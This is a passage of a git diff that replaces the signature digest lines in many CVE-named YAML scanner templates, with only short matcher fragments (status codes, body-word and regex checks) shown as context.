@@ http: - type: status status: - 404 -# digest: 4a0a00473045022002211a03096dd54eb8c3d75c4c6b2ec6e688174a032a7e6c2aa6abf607de4458022100cb1bece977e680447b79ab7a7829bea6009908a87348e63ddeba2341904d33fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f23f2b12ed7a3dcfe3a1b8d1cd6b788e26e84f1d6eec4b0922c96e07f74ecb8d0220320723b44542453d3129cff526399b4a778d877101dd5dc7de7ffe1fa186aa9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 8037c57a0c..2a6f63a94d 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 404 -# digest: 4a0a004730450220010262b4de9c6ff3122acc32c8ece3f4732b2d28ed1e6d3048a1524b26505297022100f98b46a4ccfddc90026ae807b177eece99376bfde1ec4ef6b03c52ec88157a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220531c0aa7c99e8b788d4e306d09cefbbe38664468e7307be31dbffc11d1242f850221009578f9e5d962f0472ae830419e30be1853e6de85f97ecc54fea55b75452fc8f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 1c08ea0c16..856e5f857a 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, "")' - 'contains(body, "Select ")' condition: and -# digest: 4a0a00473045022063e17e9119db0e711c2185a23a857e3c34a07b1c70353f799246c634d4e373b502210098e4d61d55e9bf0a4baa6ef83c2d08c7c8e434dbcbfbd7a125170ccb3658d056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009568b6b04ed59190b506644ec8bde2998eff1dad1caef281547bbdd42ff5c6c2022076f6ce5bab29374968eab7b603c3ea666a5c1bfc44f90caa60a5c36fff75cb77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index aa8ddb10f9..39dfce2ed4 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8d42704600cbd3b6ff54126c94d34ed31967c6de8e2a12c926fbb45a236956902205488ccf7f3b181305fec30b4573024752ec9767624d685bc0b5391b87453f1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd421c5603b5f61da7b678ba6edd532c2dff2807fcbff8d72e3c9bd4219cc70302206a0d4f96845dfaf5fa0a92ee7482708a3ea721f66b8a8910318d2472012ed9ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index d0963bf496..c8a2e0a0ba 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e4ae4211819c3a0102f74e2f01245fa1f03ed7819b74592072bfe869bddf2853022100bd69a98016f2f0a1f19b4db4f757a6dd1986e530b5b323f0450d9bbc9f9528c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205714df61330a223d8ab29cb2cecca6fab9906ad6ecdefff6392db74909656e2302201a51bd618eedddf76123c100ec5c885d5a59dc5ce51c1a99f984bfa8f4a290ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 3cec46f8ca..bf4b0c15b0 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056ef355da515fd5fec4be2362351876869abc614ca07d9fce9a039bee8eccc02022100e3e2aa9accb169e9c661823b305d23dd0d1556dbfadb8071fecce855502ee56b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204fa9683d2d8a1eb36d66bd78ba75f5441e1e1f8b1fe73a619ccd0e50cca085ea02202b285d6127970a313f82d190f4905d36805d00dbf491012fd78ebf963863e9f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 5f724a60f0..a5c6c42cb9 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a93db41929ce060ff64fee5328f57e9aab33ae2d90304cfd9045ff515b71bd1c022060dcf99e3c0172ccfcd1f7d068dfe41d2b7eb794183cacb03efab0efefc6f339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea631c265d17fb843c536edfceaa0880ca357dffd81ad99bb2dfa24f41ffee3e0221009248381c88cdd411963f85bcbfe7f9fbcdd7297527d8eaec517de43ca8617b65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index aad436fe5a..ad1a0588b7 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ab01aaa506a6ebbad0beb8069bc5370186ee053320cfa747184e193f37d774a022100b0046b6845259abb54266ef0299e04aaf6dc2cdff6f3d9c86c29cd20b534bc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f51202bd643ea3d23ea6af2a9c6a1323d06dce6ea0497c0c45cac707ed1bb07022100d1284e3a5c79d32d2a4508e11676fd2d3f17053deece04191d43383a0d9056d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index b8d9c04e22..3560fe9396 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -47,4 +47,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and -# digest: 490a0046304402204036ea21962a8358bf28cfe4e30afd87bee2fbd81960480db8568c56da29777902207c2d8fa3bae877879ef164102d75f536f8c843c4e1d443c9bc9c73c33417d370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b4002156d1c417b4a74937e2f1bb1c82514f584482b5e1a94eb404455a62e81022100cdac344e67d48a061606190191c8031971d2aa0904472b94f44a35380bb5f7c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 5f5be46b66..2ae464e273 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -45,4 +45,4 @@ http: part: body words: - "

Interactsh Server

" -# digest: 4b0a00483046022100b810cd7135af4ac4280bcbb9a33af48834cfab8a8a104301dc1233773a645af5022100df9ffc099f882bc743890dc78cc2de64f4a92da50a2bd3d1bc9193d1dedd1f1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022017ef3e771c51d1d4f3306aa79fcccc291b263d020cbdd4b9b884010b9bf775f3022100af0e67bc1486df800715864fb143e17beab07d61c93127daacd3991c5a1cc9a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index e8fe5e157f..31ed9a33cf 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100e808a43a439e765a63d1b5cad4a5beeaa462bb15bcd0d6b064822dd624152fad022032ef9ca1827b9acfd5826cef54120a9a5117625af4e9f1378a351b26444de0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4dac44f83f4d3e9c467e9712a1d4215b590fa698ceb97ad3911f2570a59cec60220731ca609ef04a4f96587b5df22791b831897cef8fa8e85875d419972adb72121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 17eb6def11..9290385545 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022040585671c609fe334367822249136fb6366ff15bb77949df51bd3507925f2761022100b01f4c652002b57730f4b33c3d84cb008efda5f95ba10bcb36d58277216be1c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080635d9fda60dbf335d16afdc3c2aab86ed32e893609ecda3f4dd3eeb2ed243802206b59294c3d35ee7a1998c772de24c72a0655ff077fe2d23c1bee1538dab1fb96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 0fde0972d0..64f3d66fa2 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d1d3e1624f6b7d4937d108b86ac91b2bc80ae4e861df56df8d26c87a1985d5e022100e1aae9b6ef9306b43a16bf1defea1dffeda0cfcb6d286fb4a91eb74db4f94022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018f286de6735704a10f409c4043aee26048603f483040ef7d870bb082ff95bf2022100d5e1266f29de7b6b56d3672527aead4d55ffe9b03479bd498af75bc146c627cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 49637bb90e..46a54fc225 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -51,4 +51,4 @@ http: part: header words: - "application/json" -# digest: 4b0a00483046022100e9d63bc45aaf82137f887487f967ad8d4a41d3f913dfc5b4d4d7d4c5587ca0c2022100f949ff4cefbc5e5c63a8c50244c0e269764063a363693d776245a8dc60f86bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6fe5cb4fe0961d377873ec798ae30e388a187213c0b8346113ef78710c260b7022100e9b8d091872aa733437d61c7871e8a27d049d6008c3c6e7222fbbc60c446f68d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 92e9cdcf6a..c189749322 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -67,4 +67,4 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request -# digest: 4a0a00473045022100cd03e342025e4e4e80c95f6b5830928e3c04fa9aaf85d57c0c25b011d377f2dc022071e70c560ca19c5672698896f856d803cc045931a344b12763e88e9576237d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091b241f43efd85a503a9edbd46d2586e6d58781e3d6c8ac8a6ede7732819f7b60220121a99b6f4c39b5038d53430715f2db20bf7c22e146d4351b7a21b450015a11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 50b2cd8202..031c337efd 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -68,4 +68,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a004830460221009ced93a185c58b88df1c70897c1f6dfbaf25212b4cf23e967daab07a3f4f8b26022100d60ce7b8a964ef513617dbe328e1d821211c417229337310c3ed6f29afc9be9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220306af1984779055449b15b598560216e9627fe8c89c738baa5369b7e68ad7c34022100b8b7330f2576b38971622d54a4f5c3c955f6d9977f4c8310dc4b4663807041f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 05208a18ce..994250ca5c 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022027e4cfe6c74428a54ab533bd2a916dc9d6cf210d604b99c8966d52ce649709bf022100ae914cfbdca0edf2dc747a74933906c9fefdb395d0ca32ebffc53fb08a8afd29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fb6ff79856c1ea57a6a57a420a5f887950a47e185d01586c80143172e0a8dac022100bb958531272050b143cf7131ffd2bf7c93a1f74868013ce0157bd4dd655a085d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 6206da0636..fe931d8fd4 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -136,4 +136,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a0047304502200ac0fdf892a88e6623b9ea9eb161e13825b21005149165a114a80210ac403468022100be64ce591a07ff770d1fb4b7f5c8eba983dafc66047ab3ed86438c32bf30ce53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c99a72cd695b897b931cad1d38d07ca45c70e164c7136a4cac2592d075d90f54022100afc6513a339b7815c8a694fcdb6ca71474b84f37cc7627864a271f3d6038a3ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index cb6812aa19..692215d215 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3aee961f865ab0369274e259216c6aeb8c0e3e05085fcc01c6e0bdc64144aec022100c8df2a03150f4267cb69a65308a40da4bcfe440d407ddbcf758fd1f0d6360525:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057231a0db348281b6e9c5b4302d45e766dc07e6fe4af1ff3ef80bbf1fa3f72ca022014ecd7a809f57f9469cb586530a8e5bf82d824521b6896ea3622623ccef4d4f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index 07807ed6b9..69c08d0647 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b013fa8cee3a52712247ffcd2dc866e9fd3ca0812ee6b12ed34bc232b93a22f50220238f3dbe08c862c1f4dd2e1dce53b879a0e957e1c0328e8f606a4d1dc5b39a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e55f7ea171270b3ed6fb5701ab4a34e3818eee98c10ea31d4e2ca6953bfb41d02210090f6299c4b59ab6bd0e4b4af051ef7e92263d2578db8a9416eb91d7b6e5d4c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index 338b8cadc1..1069476896 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220647e8f5f43a41c1a5aa3e3e63c2cfc8fe1a095dec58d83435c28fa7bd8670a06022005456b8e4eaa85755e6312e7fb4b336d568fd2f5df3868e19a0bff431f1b0174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022062d17e68260f62c93c96e57d10be825a465f4127c6049b79971828e0f5945fb102210081b34b99d2b62d9f2fc658f6e406b8f8ab95d22f65293c7a63dd027d5e1268c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 1d80b0dafc..6f338944b2 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -47,4 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100dcb22e6c510cd8249b7da40e18ca2b37a495d6532ca3c7dc25c792c87a787e4f0221009b2ee3dc8e5dc4ccb06be4f0848082b21ddd75cb8c3bc3e91ace472f66cac295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a215ae170ee447f12127bcd88694cfa9a3efe06dfc4c838ee414b72af534b48022100f9d28d9da61de82fea8e1af3990ccfa2f51592237164217c9c7810f1d4890adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 8db6690e21..263fad24a7 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203a57686d800971e9c2d9e5c6af79ff460d57e595cc69bce08b60c90622d3b2c7022100a476ff76a56c7f5fba89e4a8a776f2e7e19a8c74054dfd44dbdf5404bf76a99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054198818ba3b9ee9b335743657a3d06304f3445ab084feb29434bb2a5860633d022100f43b5a255579c1cebee7c0bf0ae67172676e57cf4f5c1c5ada8627b04d0fbb80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index afee472e3b..ed80c959e0 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -46,4 +46,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")' condition: and -# digest: 4b0a004830460221008a28b99414d2dfa37f05b900afd1ede85d6928122a9802832f8cdf91a3f64cb90221008f371160f0cb6a42a2d306a44bbfc66fe9117fac833e12ef28a93ab878e58bbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220411e491dd1303ae052dafb68d14917823da18347f38f61fe8f9ed7fbc8dedcd202207e676d9affa4e8fcf42f6b5715534ec57ae860c7394627348a49dca2b82dc0a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index c7106c825e..c1acaf9f64 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -76,4 +76,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6af7c0ad168b3fb85272dc44681080e4a7ed2456efc19b6defc684e1a0562ff02210084e9b807f03f3273017b3a5fbc4d558ae8c2875b04f72515dabbe355a2818806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207bdb3ba180165c7795e0f29e6ec2b04143699bdb5c28fb09fe187f8b3ab82acb02205ad3bbfd30aa5d1314dc18f6218c9f6e7148b0cd547c87e9cbe27fe899b02b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index cecfcbaa83..96d978a5c4 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022052802cfd25ee856c332eb660c66830c3689544bd7aba2b8ff4b1500de1e2027802200778be104007082ada0fc04e635bfe5324e1e1a495df93bd3c658b457c9cef64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050dfe336047970686ede9528ec1729c90a6b9260959da94ac7dd4fea35729bc2022100b0ab0f188a6ffa9933143380a507a45ca61878a6855a8554952607c01d80fa2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index 4b8ae5d13c..b25f9a7c51 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -51,4 +51,4 @@ http: - type: word words: - '{{md5({{num}})}}' -# digest: 4a0a00473045022100a3a16c285bb2bbd0ca79228c15a194013e67e2f1d1e2429058ff03750383e808022062c6d347e89f8c3a09499dbc165cb56c864338da5d2dd6976f9a776f7dcef0c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220546106a7f2e5d87e4644af7e6149e2152ad3ff4bba50bf14273c1d969fcdcbbb0220213a962730e5bed5cbf2cafe4775a0ce842a873bed29946a1e020f5bc86dc748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index babbd5d474..80605c8174 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220081baa985fc1033d4ac4acecf70f0c6d36ebd6166ce094078b99c08d24143515022006d5ecfd03e07daaef2f30a3221a2fb37ca70d3bf0a7c34a95c71ffdbca43b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207cb83e87b3cb11b3eb8d23b3be72e70b9dde5d94d8752b76dcfc88f7291d5b4e022100c79cd09153de2c935fc3523561954939d7a907225c7bc149a8ea586ed9b8a553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index df3133b976..7615047c3b 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046cb66c855a26f79d49ac35934e0d4a2803899ae12afc6bdc9b7a73a129c639d022100925c6fa136fedd27f810c9e078540c040554272d25ad71db1ff179378902b2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009714759f9c55ff762d4170cebfc285ef71775e8e264e47c6fe4db3cfd471434702203ee16fefce1a7e50630a4bbda4c992381a98161b415bda5157f86cd6357d5175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index 061424f51c..4bf25d759c 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -78,4 +78,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4a0a00473045022100e4b5c77043fd58c33c2003e2800f45efaa99ac3907c021513ce8c19ba33741ad022054815969a3defdf9bd793eaab97d2b5d4f56ace691e5b463db543177a892d402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3d3bc80c2563a5688551b948e65b0203169d43cc89953eb1c7d516d78ac170102204546b5c84910e40c6605d5420f5c79b5d82d597dcf7b67f0e6a01198a6adc8f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index f66ac4443f..5bbd3618a1 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -78,4 +78,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 490a004630440220440774df54f926d2f453b8d155ef6d625b0cf8b3bd6ae2c520e5bd1f2cd549d80220543f2ab0ffb604510676033c32003ea4f5ad46e6ea52fcd536b79e3eb9d5e4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2f4afa696d13c147919f015de9a4b7f9d2833d92d3c89730e2788f908ac82bd022100e72fa421311697b5aa387722c9b6c850144b4d01a0d037dc8a05d7a8a6c55333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index fea929fed9..7c8c79147f 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -60,4 +60,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4b0a00483046022100d211f452a16960f2a6c0e2a0e03cbb6d4c45711575d380ea3dbd44eb90b3b075022100be606f28dd5f235f36b247b778f2be2bbd3a10ad900979d2d63417e35ce02265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c644d08566b9c77241ddd93ef67fc73f5dee9b9b875b2e01c16170308b144ba02203f3e5039a3fdb17341d79f6fb7e5de64196e36c682c711e31fb8460c1357fb29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index cddc995cea..ade2575443 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e97aad495112770ba4acb8126e83254747ceb8ff603eaa87925208d4e8d3890b0221008e6cfe1ab83fc37ab9c4670a4add34a9be5189dbb1adb8c487b34f2c345e31ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009558c7ec3e1a55dd6049c8cbe33690c2ae36e63876db181f7d6838993d8df925022100cd6c1d53f5ce281c93ad0c3b25e6a08aac9f5f281369fae8fccd51f4fddf2e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index b091627374..9771d23554 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100ed504b6bb2d73ae075772d8bbeef9388f102078b13b0c56eb81f740139a70eb8022100986d820b3bf728c892f1909f80ab0498e055aaa89b2c446f992b1c9073a4210d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f1af4db19b6e2a6ea8eac38119f34c635b5ead62dbf540348f21dec73c16ca902203f700eef9c4169e63b94f7e4d602a219c7ae2bd9c6110dc2bc4822398f2b9a6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 069c97cfb5..f803bb24bd 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502201470d322dc6b0680a49f09870bcafdb0b02e4a95c1c5c66c5ce3738f6504e97b022100958fef932a5c251fc404ce725e6ae71ea58d6f4acab4a67b2415c49f5b2d4da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044df5d6ed82beb569d583783aca8455613328106391b6e01843a58e3fc8e1b7902207d1ae71d4bb3c4cf07108ff0a91fc1e5ab3d326187861c7cbd2bb74561f989b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index daac10983c..55e4db7bf0 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 500 -# digest: 4b0a004830460221009865277077046199a9fd615bff84b7283df98ce4d3192205eaf8ee7ad69d739f022100f11cc68200e46913732ea7e9004ea292337844397be7504925a8221459e698df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204981a1988bcd5e4537537c19e072e1e2f6fa8a86e5c0a187bfd4b6da0400c229022100b621269d1952f207a11b6ac625194b125c1e339137f8c943bf09089dc09f744f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48012.yaml 